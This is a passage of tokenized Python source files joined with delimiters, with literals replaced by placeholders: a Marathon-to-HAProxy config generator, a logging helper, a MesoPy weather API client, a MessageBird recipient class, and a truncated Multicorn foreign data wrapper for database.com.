compareWriteAndReloadConfig ( config , config_file ) : <EOL> runningConfig = str ( ) <EOL> try : <EOL> logger . debug ( "<STR_LIT>" , config_file ) <EOL> with open ( config_file , "<STR_LIT:r>" ) as f : <EOL> runningConfig = f . read ( ) <EOL> except IOError : <EOL> logger . warning ( "<STR_LIT>" ) <EOL> if runningConfig != config : <EOL> logger . info ( <EOL> "<STR_LIT>" ) <EOL> if writeConfigAndValidate ( config , config_file ) : <EOL> reloadConfig ( ) <EOL> else : <EOL> logger . warning ( "<STR_LIT>" ) <EOL> def get_health_check ( app , portIndex ) : <EOL> for check in app [ '<STR_LIT>' ] : <EOL> if check . get ( '<STR_LIT:port>' ) : <EOL> return check <EOL> if check . get ( '<STR_LIT>' ) == portIndex : <EOL> return check <EOL> return None <EOL> healthCheckResultCache = LRUCache ( ) <EOL> def get_apps ( marathon ) : <EOL> apps = marathon . list ( ) <EOL> logger . debug ( "<STR_LIT>" , [ app [ "<STR_LIT:id>" ] for app in apps ] ) <EOL> marathon_apps = [ ] <EOL> processed_apps = [ ] <EOL> deployment_groups = { } <EOL> for app in apps : <EOL> deployment_group = None <EOL> if '<STR_LIT>' in app [ '<STR_LIT>' ] : <EOL> deployment_group = app [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> if deployment_group [ <NUM_LIT:0> ] != '<STR_LIT:/>' : <EOL> deployment_group = '<STR_LIT:/>' + deployment_group <EOL> app [ '<STR_LIT:id>' ] = deployment_group <EOL> else : <EOL> processed_apps . append ( app ) <EOL> continue <EOL> if deployment_group in deployment_groups : <EOL> prev = deployment_groups [ deployment_group ] <EOL> cur = app <EOL> if '<STR_LIT>' in prev [ '<STR_LIT>' ] : <EOL> prev_date = dateutil . parser . parse ( <EOL> prev [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> else : <EOL> prev_date = '<STR_LIT>' <EOL> if '<STR_LIT>' in cur [ '<STR_LIT>' ] : <EOL> cur_date = dateutil . parser . parse ( <EOL> cur [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> else : <EOL> cur_date = '<STR_LIT>' <EOL> old = new = None <EOL> if prev_date < cur_date : <EOL> old = prev <EOL> new = cur <EOL> else : <EOL> new = prev <EOL> old = cur <EOL> target_instances = int ( new [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> old_tasks = sorted ( old [ '<STR_LIT>' ] , key = lambda task : task [ '<STR_LIT:id>' ] ) <EOL> healthy_new_instances = <NUM_LIT:0> <EOL> if len ( app [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> for task in new [ '<STR_LIT>' ] : <EOL> if '<STR_LIT>' not in task : <EOL> continue <EOL> alive = True <EOL> for result in task [ '<STR_LIT>' ] : <EOL> if not result [ '<STR_LIT>' ] : <EOL> alive = False <EOL> if alive : <EOL> healthy_new_instances += <NUM_LIT:1> <EOL> else : <EOL> healthy_new_instances = new [ '<STR_LIT>' ] <EOL> maximum_drainable = max ( <NUM_LIT:0> , ( healthy_new_instances + old [ '<STR_LIT>' ] ) - <EOL> target_instances ) <EOL> for i in range ( <NUM_LIT:0> , min ( len ( old_tasks ) , <EOL> healthy_new_instances , <EOL> maximum_drainable ) ) : <EOL> old_tasks [ i ] [ '<STR_LIT>' ] = True <EOL> merged = old <EOL> old_tasks . extend ( new [ '<STR_LIT>' ] ) <EOL> merged [ '<STR_LIT>' ] = old_tasks <EOL> deployment_groups [ deployment_group ] = merged <EOL> else : <EOL> deployment_groups [ deployment_group ] = app <EOL> processed_apps . extend ( deployment_groups . values ( ) ) <EOL> SERVICE_PORT_ASSIGNER . reset ( ) <EOL> for app in processed_apps : <EOL> appId = app [ '<STR_LIT:id>' ] <EOL> if appId [ <NUM_LIT:1> : ] == os . environ . get ( "<STR_LIT>" ) : <EOL> continue <EOL> marathon_app = MarathonApp ( marathon , appId , app ) <EOL> if '<STR_LIT>' in marathon_app . app [ '<STR_LIT>' ] : <EOL> marathon_app . groups = marathon_app . app [ '<STR_LIT>' ] [ '<STR_LIT>' ] . split ( '<STR_LIT:U+002C>' ) <EOL> marathon_apps . append ( marathon_app ) <EOL> service_ports = SERVICE_PORT_ASSIGNER . get_service_ports ( app ) <EOL> for i , servicePort in enumerate ( service_ports ) : <EOL> if servicePort is None : <EOL> logger . warning ( "<STR_LIT>" ) <EOL> continue <EOL> service = MarathonService ( <EOL> appId , servicePort , get_health_check ( app , i ) ) <EOL> for key_unformatted in label_keys : <EOL> key = key_unformatted . format ( i ) <EOL> if key in marathon_app . app [ '<STR_LIT>' ] : <EOL> func = label_keys [ key_unformatted ] <EOL> func ( service , <EOL> key_unformatted , <EOL> marathon_app . app [ '<STR_LIT>' ] [ key ] ) <EOL> marathon_app . services [ servicePort ] = service <EOL> for task in app [ '<STR_LIT>' ] : <EOL> if not task [ '<STR_LIT:host>' ] : <EOL> logger . warning ( "<STR_LIT>" + <EOL> task [ '<STR_LIT:id>' ] ) <EOL> continue <EOL> if marathon . health_check ( ) and '<STR_LIT>' in app and len ( app [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> alive = True <EOL> if '<STR_LIT>' not in task : <EOL> if not healthCheckResultCache . get ( task [ '<STR_LIT:id>' ] , False ) : <EOL> continue <EOL> else : <EOL> for result in task [ '<STR_LIT>' ] : <EOL> if not result [ '<STR_LIT>' ] : <EOL> alive = False <EOL> healthCheckResultCache . set ( task [ '<STR_LIT:id>' ] , alive ) <EOL> if not alive : <EOL> continue <EOL> task_ip , task_ports = get_task_ip_and_ports ( app , task ) <EOL> if not task_ip : <EOL> logger . warning ( "<STR_LIT>" ) <EOL> continue <EOL> draining = task . get ( '<STR_LIT>' , False ) <EOL> for task_port , service_port in zip ( task_ports , service_ports ) : <EOL> service = marathon_app . services . get ( service_port , None ) <EOL> if service : <EOL> service . groups = marathon_app . groups <EOL> service . add_backend ( task [ '<STR_LIT:host>' ] , <EOL> task_ip , <EOL> task_port , <EOL> draining ) <EOL> apps_list = [ ] <EOL> for marathon_app in marathon_apps : <EOL> for service in list ( marathon_app . services . values ( ) ) : <EOL> if service . backends : <EOL> apps_list . append ( service ) <EOL> return apps_list <EOL> def regenerate_config ( apps , config_file , groups , bind_http_https , <EOL> ssl_certs , templater ) : <EOL> compareWriteAndReloadConfig ( config ( apps , groups , bind_http_https , <EOL> ssl_certs , templater ) , config_file ) <EOL> class MarathonEventProcessor ( object ) : <EOL> def __init__ ( self , marathon , config_file , groups , <EOL> bind_http_https , ssl_certs ) : <EOL> self . __marathon = marathon <EOL> self . __apps = dict ( ) <EOL> self . __config_file = config_file <EOL> self . __groups = groups <EOL> self . __templater = ConfigTemplater ( ) <EOL> self . __bind_http_https = bind_http_https <EOL> self . __ssl_certs = ssl_certs <EOL> self . __condition = threading . Condition ( ) <EOL> self . __thread = threading . Thread ( target = self . do_reset ) <EOL> self . __pending_reset = False <EOL> self . __stop = False <EOL> self . __thread . start ( ) <EOL> self . reset_from_tasks ( ) <EOL> def do_reset ( self ) : <EOL> with self . __condition : <EOL> logger . info ( '<STR_LIT>' ) <EOL> while True : <EOL> self . __condition . acquire ( ) <EOL> if self . __stop : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> if not self . __pending_reset : <EOL> if not self . __condition . wait ( <NUM_LIT> ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> self . __pending_reset = False <EOL> self . __condition . release ( ) <EOL> try : <EOL> start_time = time . time ( ) <EOL> self . __apps = get_apps ( self . __marathon ) <EOL> regenerate_config ( self . __apps , <EOL> self . __config_file , <EOL> self . __groups , <EOL> self . __bind_http_https , <EOL> self . __ssl_certs , <EOL> self . __templater ) <EOL> logger . debug ( "<STR_LIT>" , <EOL> time . time ( ) - start_time ) <EOL> except requests . exceptions . ConnectionError as e : <EOL> logger . error ( "<STR_LIT>" . format ( <EOL> e . errno , e . strerror ) ) <EOL> except : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> def stop ( self ) : <EOL> self . __condition . acquire ( ) <EOL> self . __stop = True <EOL> self . __condition . notify ( ) <EOL> self . __condition . release ( ) <EOL> def reset_from_tasks ( self ) : <EOL> self . __condition . acquire ( ) <EOL> self . __pending_reset = True <EOL> self . __condition . notify ( ) <EOL> self . __condition . release ( ) <EOL> def handle_event ( self , event ) : <EOL> if event [ '<STR_LIT>' ] == '<STR_LIT>' or event [ '<STR_LIT>' ] == '<STR_LIT>' or event [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> self . reset_from_tasks ( ) <EOL> def get_arg_parser ( ) : <EOL> parser = argparse . ArgumentParser ( <EOL> description = "<STR_LIT>" , <EOL> formatter_class = argparse . ArgumentDefaultsHelpFormatter ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" <EOL> ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , <EOL> nargs = "<STR_LIT:+>" , <EOL> help = "<STR_LIT>" + <EOL> "<STR_LIT>" <EOL> ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , <EOL> help = "<STR_LIT>" + <EOL> "<STR_LIT>" <EOL> ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , <EOL> help = "<STR_LIT>" + <EOL> "<STR_LIT>" <EOL> ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> default = "<STR_LIT>" <EOL> ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> action = "<STR_LIT>" , <EOL> default = list ( ) ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT:-c>" , <EOL> help = "<STR_LIT>" , <EOL> default = None ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> type = int , default = <NUM_LIT:1000> <EOL> ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> default = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> type = int , default = <NUM_LIT> ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> type = int , default = <NUM_LIT> ) <EOL> parser = set_logging_args ( parser ) <EOL> parser = set_marathon_auth_args ( parser ) <EOL> return parser <EOL> def run_server ( marathon , listen_addr , callback_url , config_file , groups , <EOL> bind_http_https , ssl_certs ) : <EOL> processor = MarathonEventProcessor ( marathon , <EOL> config_file , <EOL> groups , <EOL> bind_http_https , <EOL> ssl_certs ) <EOL> try : <EOL> marathon . add_subscriber ( callback_url ) <EOL> def wsgi_app ( env , start_response ) : <EOL> length = int ( env [ '<STR_LIT>' ] ) <EOL> data = env [ '<STR_LIT>' ] . read ( length ) <EOL> processor . handle_event ( json . loads ( data . decode ( '<STR_LIT:utf-8>' ) ) ) <EOL> start_response ( '<STR_LIT>' , [ ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) ] ) <EOL> return [ "<STR_LIT>" . encode ( '<STR_LIT:utf-8>' ) ] <EOL> listen_uri = parse . urlparse ( listen_addr ) <EOL> httpd = make_server ( listen_uri . hostname , listen_uri . port , wsgi_app ) <EOL> httpd . serve_forever ( ) <EOL> finally : <EOL> processor . stop ( ) <EOL> def clear_callbacks ( marathon , callback_url ) : <EOL> logger . info ( "<STR_LIT>" . format ( callback_url ) ) <EOL> marathon . remove_subscriber ( callback_url ) <EOL> def process_sse_events ( marathon , config_file , groups , <EOL> bind_http_https , ssl_certs ) : <EOL> processor = MarathonEventProcessor ( marathon , <EOL> config_file , <EOL> groups , <EOL> bind_http_https , <EOL> ssl_certs ) <EOL> try : <EOL> events = marathon . get_event_stream ( ) <EOL> for event in events : <EOL> try : <EOL> if ( event . data . strip ( ) != '<STR_LIT>' ) : <EOL> for real_event_data in re . split ( r'<STR_LIT:\r\n>' , event . data ) : <EOL> data = json . loads ( real_event_data ) <EOL> logger . info ( <EOL> "<STR_LIT>" <EOL> . format ( data [ '<STR_LIT>' ] ) ) <EOL> processor . handle_event ( data ) <EOL> else : <EOL> logger . info ( "<STR_LIT>" ) <EOL> except : <EOL> print ( event . data ) <EOL> print ( "<STR_LIT>" , sys . exc_info ( ) [ <NUM_LIT:0> ] ) <EOL> traceback . print_stack ( ) <EOL> raise <EOL> finally : <EOL> processor . stop ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> arg_parser = get_arg_parser ( ) <EOL> args = arg_parser . parse_args ( ) <EOL> if args . longhelp : <EOL> print ( __doc__ ) <EOL> print ( '<STR_LIT>' ) <EOL> arg_parser . print_help ( ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( ConfigTemplater ( ) . get_descriptions ( ) ) <EOL> sys . exit ( ) <EOL> else : <EOL> if args . marathon is None : <EOL> arg_parser . error ( '<STR_LIT>' ) <EOL> if args . sse and args . listening : <EOL> arg_parser . error ( <EOL> '<STR_LIT>' ) <EOL> if bool ( args . min_serv_port_ip_per_task ) != bool ( args . max_serv_port_ip_per_task ) : <EOL> arg_parser . error ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if args . min_serv_port_ip_per_task > args . max_serv_port_ip_per_task : <EOL> arg_parser . error ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if len ( args . group ) == <NUM_LIT:0> : <EOL> arg_parser . error ( '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> if args . min_serv_port_ip_per_task and args . max_serv_port_ip_per_task : <EOL> SERVICE_PORT_ASSIGNER . set_ports ( args . min_serv_port_ip_per_task , <EOL> args . max_serv_port_ip_per_task ) <EOL> s = requests . Session ( ) <EOL> a = requests . adapters . HTTPAdapter ( max_retries = <NUM_LIT:3> ) <EOL> s . mount ( '<STR_LIT>' , a ) <EOL> setup_logging ( logger , args . syslog_socket , args . log_format ) <EOL> if args . health_check : <EOL> healthCheckResultCache = LRUCache ( args . lru_cache_capacity ) <EOL> set_ip_cache ( LRUCache ( args . lru_cache_capacity ) ) <EOL> marathon = Marathon ( args . marathon , <EOL> args . health_check , <EOL> get_marathon_auth_params ( args ) ) <EOL> if args . listening : <EOL> callback_url = args . callback_url or args . listening <EOL> try : <EOL> run_server ( marathon , args . listening , callback_url , <EOL> args . haproxy_config , args . group , <EOL> not args . dont_bind_http_https , args . ssl_certs ) <EOL> finally : <EOL> clear_callbacks ( marathon , callback_url ) <EOL> elif args . sse : <EOL> backoff = <NUM_LIT:3> <EOL> while True : <EOL> stream_started = time . time ( ) <EOL> try : <EOL> process_sse_events ( marathon , <EOL> args . haproxy_config , <EOL> args . group , <EOL> not args . dont_bind_http_https , <EOL> args . ssl_certs ) <EOL> except : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> backoff = backoff * <NUM_LIT> <EOL> if backoff > <NUM_LIT> : <EOL> backoff = <NUM_LIT> <EOL> logger . error ( "<STR_LIT>" , backoff ) <EOL> if time . time ( ) - stream_started > <NUM_LIT> : <EOL> backoff = <NUM_LIT:3> <EOL> time . sleep ( random . random ( ) * backoff ) <EOL> else : <EOL> regenerate_config ( get_apps ( marathon ) , args . haproxy_config , args . group , <EOL> not args . dont_bind_http_https , <EOL> args . ssl_certs , ConfigTemplater ( ) ) </s>
<s> from __future__ import absolute_import , print_function <EOL> import functools <EOL> import logging <EOL> import sys <EOL> import time <EOL> debug = logging . debug <EOL> def fatal ( msg , code = <NUM_LIT:1> ) : <EOL> sys . stdout . write ( msg + "<STR_LIT:\n>" ) <EOL> logging . error ( msg ) <EOL> sys . exit ( code ) <EOL> def fn ( f , * args , ** kwargs ) : <EOL> logging . debug ( "<STR_LIT>" . format ( repr ( f ) , args , kwargs ) ) <EOL> return f ( * args , ** kwargs ) <EOL> def duration ( fn ) : <EOL> @ functools . wraps ( fn ) <EOL> def timer ( * args , ** kwargs ) : <EOL> start = time . time ( ) <EOL> try : <EOL> return fn ( * args , ** kwargs ) <EOL> finally : <EOL> debug ( "<STR_LIT>" . format ( <EOL> fn . __module__ , <EOL> fn . __name__ , <EOL> time . time ( ) - start ) ) <EOL> return timer </s>
<s> try : <EOL> import urllib . parse <EOL> import urllib . request <EOL> import urllib . error <EOL> except ImportError : <EOL> import urllib2 <EOL> import urllib <EOL> import json <EOL> class MesoPyError ( Exception ) : <EOL> def __init__ ( self , error_message ) : <EOL> self . error_message = error_message <EOL> def __str__ ( self ) : <EOL> r"""<STR_LIT>""" <EOL> return repr ( self . error_message ) <EOL> class Meso ( object ) : <EOL> def __init__ ( self , token ) : <EOL> r"""<STR_LIT>""" <EOL> self . base_url = '<STR_LIT>' <EOL> self . token = token <EOL> self . geo_criteria = [ '<STR_LIT>' , '<STR_LIT:state>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> @ staticmethod <EOL> def _checkresponse ( response ) : <EOL> r"""<STR_LIT>""" <EOL> results_error = '<STR_LIT>' <EOL> auth_error = '<STR_LIT>' '<STR_LIT>' <EOL> rule_error = '<STR_LIT>' '<STR_LIT>' <EOL> catch_error = '<STR_LIT>' <EOL> if response [ '<STR_LIT>' ] [ '<STR_LIT>' ] == <NUM_LIT:1> : <EOL> return response <EOL> elif response [ '<STR_LIT>' ] [ '<STR_LIT>' ] == <NUM_LIT:2> : <EOL> raise MesoPyError ( results_error ) <EOL> elif response [ '<STR_LIT>' ] [ '<STR_LIT>' ] == <NUM_LIT:200> : <EOL> raise MesoPyError ( auth_error ) <EOL> elif response [ '<STR_LIT>' ] [ '<STR_LIT>' ] == <NUM_LIT> : <EOL> raise MesoPyError ( rule_error ) <EOL> elif response [ '<STR_LIT>' ] [ '<STR_LIT>' ] == - <NUM_LIT:1> : <EOL> format_error = response [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> raise MesoPyError ( format_error ) <EOL> else : <EOL> raise MesoPyError ( catch_error ) <EOL> def _get_response ( self , endpoint , request_dict ) : <EOL> """<STR_LIT>""" <EOL> http_error = '<STR_LIT>' '<STR_LIT>' <EOL> try : <EOL> qsp = urllib . parse . urlencode ( request_dict , doseq = True ) <EOL> resp = urllib . request . urlopen ( self . base_url + endpoint + '<STR_LIT:?>' + qsp ) . read ( ) <EOL> except AttributeError or NameError : <EOL> try : <EOL> qsp = urllib . urlencode ( request_dict , doseq = True ) <EOL> resp = urllib2 . urlopen ( self . base_url + endpoint + '<STR_LIT:?>' + qsp ) . read ( ) <EOL> except urllib2 . URLError : <EOL> raise MesoPyError ( http_error ) <EOL> except urllib . error . URLError : <EOL> raise MesoPyError ( http_error ) <EOL> return self . _checkresponse ( json . loads ( resp . decode ( '<STR_LIT:utf-8>' ) ) ) <EOL> def _check_geo_param ( self , arg_list ) : <EOL> r"""<STR_LIT>""" <EOL> geo_func = lambda a , b : any ( i in b for i in a ) <EOL> check = geo_func ( self . geo_criteria , arg_list ) <EOL> if check is False : <EOL> raise MesoPyError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def attime ( self , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> self . _check_geo_param ( kwargs ) <EOL> kwargs [ '<STR_LIT>' ] = self . token <EOL> return self . _get_response ( '<STR_LIT>' , kwargs ) <EOL> def latest ( self , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> self . _check_geo_param ( kwargs ) <EOL> kwargs [ '<STR_LIT>' ] = self . token <EOL> return self . _get_response ( '<STR_LIT>' , kwargs ) <EOL> def precip ( self , start , end , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> self . _check_geo_param ( kwargs ) <EOL> kwargs [ '<STR_LIT:start>' ] = start <EOL> kwargs [ '<STR_LIT:end>' ] = end <EOL> kwargs [ '<STR_LIT>' ] = self . token <EOL> return self . _get_response ( '<STR_LIT>' , kwargs ) <EOL> def timeseries ( self , start , end , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> self . _check_geo_param ( kwargs ) <EOL> kwargs [ '<STR_LIT:start>' ] = start <EOL> kwargs [ '<STR_LIT:end>' ] = end <EOL> kwargs [ '<STR_LIT>' ] = self . token <EOL> return self . _get_response ( '<STR_LIT>' , kwargs ) <EOL> def climatology ( self , startclim , endclim , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> self . _check_geo_param ( kwargs ) <EOL> kwargs [ '<STR_LIT>' ] = startclim <EOL> kwargs [ '<STR_LIT>' ] = endclim <EOL> kwargs [ '<STR_LIT>' ] = self . token <EOL> return self . _get_response ( '<STR_LIT>' , kwargs ) <EOL> def variables ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _get_response ( '<STR_LIT>' , { '<STR_LIT>' : self . token } ) <EOL> def climate_stats ( self , startclim , endclim , type , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> self . _check_geo_param ( kwargs ) <EOL> kwargs [ '<STR_LIT:type>' ] = type <EOL> kwargs [ '<STR_LIT>' ] = startclim <EOL> kwargs [ '<STR_LIT>' ] = endclim <EOL> kwargs [ '<STR_LIT>' ] = self . token <EOL> return self . _get_response ( '<STR_LIT>' , kwargs ) <EOL> def time_stats ( self , start , end , type , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> self . _check_geo_param ( kwargs ) <EOL> kwargs [ '<STR_LIT:type>' ] = type <EOL> kwargs [ '<STR_LIT:start>' ] = start <EOL> kwargs [ '<STR_LIT:end>' ] = end <EOL> kwargs [ '<STR_LIT>' ] = self . token <EOL> return self . _get_response ( '<STR_LIT>' , kwargs ) <EOL> def metadata ( self , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> self . _check_geo_param ( kwargs ) <EOL> kwargs [ '<STR_LIT>' ] = self . token <EOL> return self . _get_response ( '<STR_LIT>' , kwargs ) <EOL> def latency ( self , start , end , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> self . _check_geo_param ( kwargs ) <EOL> kwargs [ '<STR_LIT:start>' ] = start <EOL> kwargs [ '<STR_LIT:end>' ] = end <EOL> kwargs [ '<STR_LIT>' ] = self . token <EOL> return self . _get_response ( '<STR_LIT>' , kwargs ) <EOL> def networks ( self , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> kwargs [ '<STR_LIT>' ] = self . token <EOL> return self . _get_response ( '<STR_LIT>' , kwargs ) <EOL> def networktypes ( self , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> kwargs [ '<STR_LIT>' ] = self . token <EOL> return self . _get_response ( '<STR_LIT>' , kwargs ) </s>
<s> from messagebird . base import Base <EOL> class Recipient ( Base ) : <EOL> def __init__ ( self ) : <EOL> self . recipient = None <EOL> self . status = None <EOL> self . _statusDatetime = None <EOL> @ property <EOL> def statusDatetime ( self ) : <EOL> return self . _statusDatetime <EOL> @ statusDatetime . setter <EOL> def statusDatetime ( self , value ) : <EOL> self . _statusDatetime = self . value_to_time ( value ) </s>
<s> from multicorn import ForeignDataWrapper <EOL> from multicorn . utils import log_to_postgres , ERROR , DEBUG <EOL> from yajl import YajlContentHandler , YajlParser <EOL> from Queue import Queue <EOL> from threading import Thread <EOL> import urllib <EOL> import urllib2 <EOL> import json <EOL> import pprint <EOL> import collections <EOL> class CaseInsensitiveDict ( collections . Mapping ) : <EOL> def __init__ ( self , d ) : <EOL> self . _d = d <EOL> self . _s = dict ( ( k . lower ( ) , k ) for k in d ) <EOL> def __contains__ ( self , k ) : <EOL> return k . lower ( ) in self . _s <EOL> def __len__ ( self ) : <EOL> return len ( self . _s ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . _s ) <EOL> def __getitem__ ( self , k ) : <EOL> return self . _d [ self . _s [ k . lower ( ) ] ] <EOL> def actual_key_case ( self , k ) : <EOL> return self . _s . get ( k . lower ( ) ) <EOL> class ContentHandler ( YajlContentHandler ) : <EOL> _column = '<STR_LIT>' <EOL> INIT = <NUM_LIT:0> <EOL> IN_OBJECT = <NUM_LIT:1> <EOL> SEEN_RECORDS = <NUM_LIT:2> <EOL> IN_ARRAY = <NUM_LIT:3> <EOL> IN_RECORD = <NUM_LIT:4> <EOL> SEEN_KEY = <NUM_LIT:5> <EOL> _state = INIT <EOL> _depth = <NUM_LIT:0> <EOL> def __init__ ( self , queue , column_map ) : <EOL> self . _queue = queue <EOL> self . _column_map = column_map <EOL> def handle_value ( self , ctx , val ) : <EOL> if self . _state == ContentHandler . SEEN_KEY and self . _depth == <NUM_LIT:0> : <EOL> self . _state = ContentHandler . IN_RECORD <EOL> self . _record [ self . _column_map [ self . _column ] ] = val <EOL> def yajl_null ( self , ctx ) : <EOL> self . handle_value ( ctx , None ) <EOL> def yajl_boolean ( self , ctx , boolVal ) : <EOL> self . handle_value ( ctx , boolVal ) <EOL> def yajl_integer ( self , ctx , integerVal ) : <EOL> self . handle_value ( ctx , integerVal ) <EOL> def yajl_double ( self , ctx , doubleVal ) : <EOL> self . handle_value ( ctx , doubleVal ) <EOL> def yajl_string ( self , ctx , stringVal ) : <EOL> self . handle_value ( ctx , stringVal ) <EOL> def yajl_start_map ( self , ctx ) : <EOL> if self . _state == ContentHandler . SEEN_KEY : <EOL> self . _depth += <NUM_LIT:1> <EOL> elif self . _state == ContentHandler . IN_ARRAY : <EOL> self . _state = ContentHandler . IN_RECORD <EOL> self . _record = { } <EOL> elif self . _state == ContentHandler . INIT : <EOL> self . _state = ContentHandler . IN_OBJECT <EOL> def yajl_map_key ( self , ctx , stringVal ) : <EOL> if self . _state == ContentHandler . IN_RECORD : <EOL> self . _state = ContentHandler . SEEN_KEY <EOL> self . _column = stringVal <EOL> elif self . _state == ContentHandler . IN_OBJECT and stringVal == '<STR_LIT>' : <EOL> self . _state = ContentHandler . SEEN_RECORDS <EOL> def yajl_end_map ( self , ctx ) : <EOL> if self . _state == ContentHandler . SEEN_KEY : <EOL> self . _depth -= <NUM_LIT:1> <EOL> if self . _depth == <NUM_LIT:0> : <EOL> self . _state = ContentHandler . IN_RECORD <EOL> elif self . _state == ContentHandler . IN_RECORD : <EOL> self . _state = ContentHandler . IN_ARRAY <EOL> self . _queue . put ( self . _record ) <EOL> elif self . _state == ContentHandler . IN_OBJECT : <EOL> self . _state = ContentHandler . INIT <EOL> def yajl_start_array ( self , ctx ) : <EOL> if self . _state == ContentHandler . SEEN_RECORDS : <EOL> self . _state = ContentHandler . IN_ARRAY <EOL> def yajl_end_array ( self , ctx ) : <EOL> if self . _state == ContentHandler . IN_ARRAY : <EOL> self . _state = ContentHandler . IN_OBJECT <EOL> def parseToQueue ( stream , queue , column_map ) : <EOL> parser = YajlParser ( ContentHandler ( queue , column_map ) ) <EOL> parser . parse ( stream ) <EOL> queue . put ( None ) <EOL> class DatabaseDotComForeignDataWrapper ( ForeignDataWrapper ) : <EOL> def __init__ ( self , options , columns ) : <EOL> super ( DatabaseDotComForeignDataWrapper , self ) . __init__ ( options , columns ) <EOL> self . column_map = CaseInsensitiveDict ( dict ( [ ( x , x ) for x in columns ] ) ) <EOL> self . obj_type = options . get ( '<STR_LIT>' , None ) <EOL> if self . obj_type is None : <EOL> log_to_postgres ( '<STR_LIT>' , <EOL> ERROR ) <EOL> self . client_id = options . get ( '<STR_LIT>' , None ) <EOL> if self . client_id is None : <EOL> log_to_postgres ( '<STR_LIT>' , <EOL> ERROR ) <EOL> self . client_secret = options . get ( '<STR_LIT>' , None ) <EOL> if self . client_secret is None : <EOL> log_to_postgres ( '<STR_LIT>' , <EOL> ERROR ) <EOL> self . username = options . get ( '<STR_LIT:username>' , None ) <EOL> if self . username is None : <EOL> log_to_postgres ( '<STR_LIT>' , <EOL> ERROR ) <EOL> self . password = options . get ( '<STR_LIT:password>' , None ) <EOL> if self . password is None : <EOL> log_to_postgres ( '<STR_LIT>' , <EOL> ERROR ) <EOL> self . login_server = options . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . oauth = self . get_token ( ) <EOL> def get_token ( self ) : <EOL> token_url = '<STR_LIT>' % self . login_server <EOL> params = urllib . urlencode ( { <EOL> '<STR_LIT>' : '<STR_LIT:password>' , <EOL> '<STR_LIT>' : self . client_id , <EOL> '<STR_LIT>' : self . client_secret , <EOL> '<STR_LIT:username>' : self . username , <EOL> '<STR_LIT:password>' : self . password <EOL> } ) <EOL> log_to_postgres ( '<STR_LIT>' % token_url , DEBUG ) <EOL> try : <EOL> data = urllib2 . urlopen ( token_url , params ) . read ( ) <EOL> except urllib2 . URLError , e : <EOL> if hasattr ( e , '<STR_LIT:code>' ) : <EOL> if e . code == <NUM_LIT> : <EOL> log_to_postgres ( <EOL> '<STR_LIT>' , 